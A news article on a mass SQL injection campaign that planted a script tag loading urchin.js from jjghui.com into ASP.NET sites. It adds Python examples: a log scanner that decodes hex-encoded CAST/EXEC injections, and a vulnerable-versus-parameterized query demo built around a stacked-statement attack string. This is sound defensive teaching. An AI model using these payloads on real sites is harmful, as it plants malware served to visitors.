Powerful, simple new mass SQL injection attack opens 180K sites

Exploit, related to last spring's LizaMoon, is simple and highly adaptable

A new, prepackaged set of SQL injection techniques is circulating on the Internet. It injects malicious JavaScript into sites that run on ASP.NET, and that code opens a door through which attackers can slip in malware or other exploits to take over or sabotage the site.

Alex Rothacker is director of security research for Application Security, Inc.'s Team Shatter, which lists SQL injection against database-access components as the No. 2 security risk.

So far, 180,000 sites have been penetrated by the new attack. It differs from earlier SQL injections, such as the ones that cracked Sony 17 or 18 times, in that it attacks not one site at a time but dozens.

Once they're cracked, the infected sites start serving copies of the malware to their visitors, extending the attack even further.

The attacks started Oct. 9, according to web security provider Armorize, which also found only six of 43 virus detectors can pick up the malicious code.

The attack injects malicious JavaScript into ASP.NET sites that store HTML content in SQL Server databases. That stored content acts as a cache: subsequent visits to a page are far quicker because the page comes out of a local database rather than being generated again, according to Rothacker, whose analysis ran in HelpNet Security. It also means that a single successful injection into those stored rows lands the script in every page rendered from them.

When a visitor hits an infected site, the injected tag makes the browser load a script from jjghui.com. That script infects the visitor's machine with botnet-control code, giving the botnet owner the ability to run code or make changes on the newly zombified machine.

The injector and the follow-on download from jjghui.com appear to be designed to sell fake antivirus software, but the SQL injection leaves the site open to anyone else with enough savvy to run a Google search for vulnerable sites and hit them with a different set of exploits, according to Rothacker.

The jjghui attack, named for the site from which it downloads the secondary payload, uses a domain owned or controlled by the same person who launched a similar set of attacks called LizaMoon last spring. The domains carrying each attack's name are registered to James Northone of Plainview, NY, though the name appears to be an alias and his actual identity is a mystery.

One-line injection, unlimited possibilities

The injected script reads:
<script src=http://jjghui.com/urchin.js> </script>

Armorize has published a more detailed decode of the mass injection script.

The malicious SQL itself is obfuscated: the letters of the statement are replaced with numeric character codes and converted back on the database server at run time, so the plaintext never appears in the request and firewalls that match on it let the injection through.
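As an added example, not code from the article, Armorize or Team Shatter, the Python below shows how a payload encoded that way can be spotted in web-server logs and turned back into readable SQL. The log lines are constructed for this example, and the DECLARE/CAST/EXEC wrapper and the two decoded statements are assumptions modelled on the shape earlier mass injections of this kind used; the article does not show the real decoded payload. The only thing taken from the page is the injected script tag.

```python
import re
from urllib.parse import quote, unquote

# The script tag the article reports being planted in stored HTML.
INJECTED_TAG = "<script src=http://jjghui.com/urchin.js> </script>"

# Hypothetical decoded statements, constructed for this example (the article does
# not show the real decoded payload). T-SQL string concatenation is '+'.
STMT_VARCHAR = "UPDATE pages SET body=body+'" + INJECTED_TAG + "'"
STMT_NVARCHAR = "UPDATE news SET content=content+'" + INJECTED_TAG + "'"


def wrap_encoded(hex_literal, kind):
    """Assumed wrapper: the hex text is CAST back to a string on the server and run with EXEC."""
    return (f"DECLARE @S {kind}(4000);"
            f"SET @S=CAST(0x{hex_literal} AS {kind}(4000));"
            "EXEC(@S);--")


# Constructed web-server log lines, not real traffic. Line 1 is a normal visit; line 2
# carries a VARCHAR (8-bit) payload; line 3 carries a URL-encoded NVARCHAR (UTF-16LE) payload.
LOG_LINES = [
    '203.0.113.7 - - [09/Oct/2011:10:31:02 +0000] "GET /news.aspx?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Oct/2011:10:31:05 +0000] "GET /news.aspx?id=42;'
    + wrap_encoded(STMT_VARCHAR.encode("ascii").hex().upper(), "VARCHAR")
    + ' HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Oct/2011:10:32:11 +0000] "GET /page.aspx?id=7%3B'
    + quote(wrap_encoded(STMT_NVARCHAR.encode("utf-16-le").hex().upper(), "NVARCHAR"), safe="")
    + ' HTTP/1.1" 200 5120',
]

# Matches a hex literal being cast to a string type, whatever letter case the attacker used.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)


def decode_hex_sql(hex_literal):
    """Turn the numeric character codes back into the statement they hide."""
    if len(hex_literal) % 2:
        raise ValueError("odd-length hex literal")
    raw = bytes.fromhex(hex_literal)
    # NVARCHAR payloads are UTF-16LE; for ASCII text every second byte is zero.
    if raw and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def scan_log(lines):
    """Return (line number, target type, decoded SQL) for every hex-encoded CAST seen."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in HEX_CAST.finditer(unquote(line)):  # undo %XX encoding first
            try:
                decoded = decode_hex_sql(match.group(1))
            except ValueError as exc:
                decoded = f"<undecodable: {exc}>"
            hits.append((number, match.group(2).upper(), decoded))
    return hits


if __name__ == "__main__":
    for number, kind, sql in scan_log(LOG_LINES):
        print(f"line {number} [{kind}]: {sql}")
```

Running it prints the two hidden UPDATE statements, both ending in the script tag from the article; the normal visit on line 1 is not reported. Because the regex runs after percent-decoding, it catches the payload whether the attacker sent it raw or URL-encoded, and the UTF-16 check handles the NVARCHAR variant without a second pattern.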

The tool searches for sites vulnerable to this particular attack and directs itself against them, Rothacker writes.

There's no easy way to fix the database's exposure to this attack other than to "harden" it by applying all the patches and making all the security settings consistent. Monitoring the database for unusual activity is important, too.

The key is to keep the injections out in the first place.

To do that, the main web server should require other web apps to present credentials that establish who they are and that they are permitted to access the site, rather than letting any unauthenticated process launch new code, Rothacker writes.

Users should also have specific limits on their access. Unknown users, or those who signed up only recently, should get no more than Read access to anything beyond the most basic information and forms, and the content of those forms should be analyzed to reduce the chance malicious code is already present.
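Rothacker's advice above covers authentication and access limits; the code-level fix that keeps this class of injection out, binding user input as a query parameter instead of pasting it into the SQL text, is not named in the article. The Python below is an added example, not code from the article, Team Shatter or any affected site. It uses SQLite from the standard library as a stand-in for SQL Server, a hypothetical `pages` table of stored HTML, and a constructed attacker input; `executescript` plays the part of SQL Server running every statement in a batch, and a read-only connection plays the part of the "Read access only" limit recommended above.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

# The script tag the article reports being planted in stored HTML.
INJECTED_TAG = "<script src=http://jjghui.com/urchin.js> </script>"

# Hypothetical attacker input for a numeric "id" parameter, constructed for this example:
# a stacked statement that appends the tag to every stored page body ('||' is SQLite's
# string concatenation; T-SQL uses '+').
ATTACK_ID = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"


def new_site_db(path):
    """Create a tiny stand-in for a site that stores its HTML in the database."""
    conn = sqlite3.connect(path)
    conn.executescript("""
        CREATE TABLE pages (
            id    INTEGER PRIMARY KEY,
            body  TEXT NOT NULL,
            views INTEGER NOT NULL DEFAULT 0
        );
        INSERT INTO pages (id, body) VALUES (1, '<h1>Welcome</h1>'), (2, '<p>About us</p>');
    """)
    conn.commit()
    return conn


def record_visit_vulnerable(conn, page_id):
    """Query built by string concatenation. executescript stands in for SQL Server,
    which runs every statement in the batch, so the attacker's second statement runs too."""
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = " + page_id + ";")
    conn.commit()


def record_visit_safe(conn, page_id):
    """Bound parameter: the input is compared as a value and never parsed as SQL."""
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (page_id,))
    conn.commit()


def infected_pages(conn):
    """IDs of pages whose stored HTML now references the attack domain."""
    rows = conn.execute("SELECT id FROM pages WHERE body LIKE ? ORDER BY id", ("%jjghui.com%",))
    return [row[0] for row in rows]


def readonly_write_blocked(path):
    """Least privilege: visitor-facing code opens the database read-only (SQLite's
    stand-in for a login limited to SELECT). True if an UPDATE is refused."""
    ro = sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)
    try:
        ro.execute("UPDATE pages SET body = body || ? WHERE id = 1", (INJECTED_TAG,))
        ro.commit()
        return False
    except sqlite3.OperationalError:
        return True
    finally:
        ro.close()


def demo():
    """Run one legitimate visit and one attack through each handler; report the damage."""
    results = {}
    workdir = tempfile.mkdtemp()
    for name, handler in (("vulnerable", record_visit_vulnerable),
                          ("parameterized", record_visit_safe)):
        path = os.path.join(workdir, name + ".db")
        conn = new_site_db(path)
        handler(conn, "1")          # a normal visitor
        handler(conn, ATTACK_ID)    # the attacker's request
        results[name] = infected_pages(conn)
        conn.close()
        results[name + "_readonly_blocked"] = readonly_write_blocked(path)
        os.remove(path)
    os.rmdir(workdir)
    return results


if __name__ == "__main__":
    print(demo())
```

With the concatenated query, the attacker's request rewrites the stored HTML of both pages, which is exactly the result the article describes. With the bound parameter the same input matches no row and changes nothing, because it is never interpreted as SQL. The read-only connection shows the second line of defence: even if a query were injectable, a connection that cannot write cannot plant the script.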

Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld.
